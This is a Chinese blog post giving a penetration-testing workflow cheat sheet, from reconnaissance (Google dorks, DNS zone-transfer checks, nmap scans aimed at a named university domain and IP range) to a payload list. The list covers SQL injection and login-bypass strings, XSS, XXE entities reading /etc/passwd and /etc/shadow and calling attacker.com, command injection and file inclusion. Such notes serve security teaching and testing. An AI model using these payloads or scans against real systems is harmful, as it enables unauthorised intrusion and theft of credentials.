博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
渗透测试流程
阅读量:6852 次
发布时间:2019-06-26

本文共 3640 字,大约阅读时间需要 12 分钟。

 

  • 1.信息收集

 

    •  确认目标 -----域名信息相关工具 

whatweb -v

         whois  

    •  DNS信息查询
          • 使用linux自带命令dig/加上网站自带tracerote
    •  测试域传送:域传送是一种DNS事务,用于在主从服务器间复制DNS记录。虽然如今已经很少见主机会开启,但 是还是应该确认一下。一旦存在域传送漏洞,就意味着你获取了整个域下面所有的记录。
          • dig -t NS syu.edu.cn +short
          • dig -t AXFR syu.edu.cn @xxx
          • dig -t AXFR syu.edu.cn @xxx
    • 公开情报收集+google hacking语法
        • 谷歌黑客数据库
        • email信息
          • site:202.199.32.0/24 查找子域名
          • intext:公司名称+email**
          • email**@公司域名
          • site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的
          • site:xxx.com intext:email
          • site:xxxx.com intext:电话 //N个电话
          • Intext:Poweredby Discuz //版本信息
          • Cache:xxx.com //缓存
        • 网站信息
          • 查找后台地址:site:域名inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
          • 查找文本内容site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
          • 查找可注入点:site:域名 inurl:aspx|jsp|php|asp
          • 查找上传漏洞:site:域名 inurl:file|load|editor|Files
          • 找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
          • 存在的数据库:site:域名 filetype:mdb|asp|#
          • 查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
          • 迂回策略入侵:inurl:cms/data/templates/images/index/
  • Maltego:交互式的数据挖掘工具。
  • Theharvester:从不同的公开资源中收集邮箱、子域名、虚拟主机、开放的端口/主机指纹和员工姓名等信息
      •  theharvester -d syu.edu.cn -l 1000 -b google

 

端口扫描,服务识别,os识别

    • Nmap带服务识别和操作系统指纹识别的TCP/IP主机和端口扫描工具
      • 扫描前1000tcp端口nmap 202.199.32.5
      • Ping扫描ip段主机 nmap –sP 202.199.32.0/24
      • 扫描指定端口 nmap –p 80443 202.199.32.5
      • 扫描前1000tcp端口,os指纹,服务 nmap –A 202.199.32.5
      • 扫描udp端口 nmap –sU 202.199.32.5
      • 扫描所有65535UDP端口,并获取服务、OS指纹 nmap –sU –P- -A 202.199.32.5
      • 常见端口漏洞信息
    • 浏览器插件
      • User Agent Switcher 一款可以快速切换用户代理的Firefox插件
      • Wappalyzer 可以检测各种各样的网站所用的技术和软件组件的插件
      • FoxyProxy 代理切换插件
  • Burp插件在网上找到的
  • Retire.js (BApp) 用于检测版本落后的Javascript组件漏洞的Burp suite扩展
  • Wsdler (BApp) 可以解析WSDL文件,然后测试所有的允许的方法的请求
  • Python Scripter (BApp) 可以在每个HTTP请求和响应时执行一段用户定义的Python脚本

  • 漏洞扫描
  • Linux自带NIKto:有指纹识别功能的Web服务漏洞扫描器
      • nikto -h http://www.syu.edu.cn -output ~/syu.edu.cn.html -Format htm
    •  burp测试可选内容
        • 使用Intruder来模糊测试 User-Agent和Referer请求头,利用FuzzDB的字典。
        • 使用acunetix自动化扫描,
        • IBM 扫描漏洞
        • 注意错误页面
          • 数据库结构和服务器文件系统等信息
    • Burp Repeater:手工修改、重放HTTP请求的Burp模块 
    • Sql注入:显示错误信息 

                           ' OR 1=1 – 1

' OR '1'='1

' or 1=1 LIMIT 1;--

     admin';--

      • Xss:  <IMG SRC=javascript:alert('XSS')>

   "><script>alert('XSS')</script><" 

 

 
 

 

   " οnmοuseοver="alert('XSS')

 

 

      • xml注入: Username = foo<

Username = foo<!—

  • XML实体注入(XXE):

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

    <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>

  • 模板注入:攻击者利用模板的语法注入恶意代码。

<%= 7 * 7 %>

{

{ 7 * 7 }}

  • 命令注入:用户注入操作系统的命令到Web应用程序并被执行,就发生了命令注入。

http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|

http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

Doc=Doc1.pdf+|+Dir c:\

  • 恶意重定向:当应用没有检查用户可控输入时,攻击者输入了恶意的URL并被应用接受时发生。

http://www.a.com?#redirect=www.fake-target.site

 

  • 本地文件包含(LFI):Web应用允许包含本地服务器端存在的文件.
http://vulnerable_host/preview.php?file=../../../../etc/passwd
  • 远程文件包含(RFI):Web应用允许包含远程服务器上存在的文件。

  • 逻辑漏洞:想要发现逻辑漏洞,你必须对目标非常了解。只有你对目标的功能都是怎么使用有了了解后,你才能推想哪里有可利用的地方。测试逻辑漏洞时,可以回想作为普通用户是如何使用Web应用的功能的,是如何一步一步完成各种动作的,然后你要做的就是不按照这些步骤来。

 

 


4漏洞利用

  • 利用xss
    • 工具beef平台
  • 利用sqli;工具sqlmap

 

 

  • 离线爆破密码工具;hashcat密码攻击

 

 

  • 认证绕过

 

  • 尝试在一些脆弱的表单里输入:

 

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

  • 跨站请求伪造(CSRF):用Generate CSRF PoC来验证是否真的存在。

 

  • Sql+xss+跨站+csrf+xml

  • 安全加固 

 

09/11/2018

youyouii 

 

转载于:https://www.cnblogs.com/youyouii/p/9936349.html

你可能感兴趣的文章
parent
查看>>
JNI Hello World
查看>>
LindDotNetCore~Ocelot实现微服务网关
查看>>
数据结构之队列——回文字判断
查看>>
消息队列
查看>>
链表的遍历
查看>>
微信小程序中的图形验证码
查看>>
数字转罗马数字
查看>>
CNN网络架构演进
查看>>
windows上安装Ipython notebook
查看>>
选择屏幕加功能码
查看>>
UIImagePickerController 视频录制操作,视频大小,时间长度
查看>>
Python Tuples
查看>>
Entity Framework 4 in Action读书笔记——第一章:数据访问重载:Entity Framework(3)...
查看>>
review过去的10年
查看>>
JAVA加密
查看>>
java.lang.NoSuchMethodError: org.apache.commons.io.FileUtils.getTempDirectory()Ljava/io/File;
查看>>
第三课:叠加法和戴维南法
查看>>
395. Longest Substring with At Least K Repeating Characters
查看>>
foreach 與 reference 的雷
查看>>